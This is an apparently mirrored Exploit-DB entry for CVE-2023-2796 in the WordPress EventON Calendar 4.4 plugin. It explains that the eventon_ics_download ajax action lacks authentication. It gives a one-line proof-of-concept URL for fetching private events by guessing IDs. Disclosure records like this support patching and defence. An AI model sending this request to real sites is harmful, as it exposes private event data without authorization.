WordPress Plugin EventON Calendar 4.4 – Unauthenticated Event Access

  • 作者: Miguel Santareno
    日期: 2023-08-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51658/
  • # Exploit Title: WordPress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
    # Date: 03.08.2023
    # Exploit Author: Miguel Santareno
    # Vendor Homepage: https://www.myeventon.com/
    # Version: 4.4
    # Tested on: Google and Firefox latest version
    # CVE : CVE-2023-2796
    
    # 1. Description
    The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
    
    
    # 2. Proof of Concept (PoC)
    Proof of Concept:
    https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value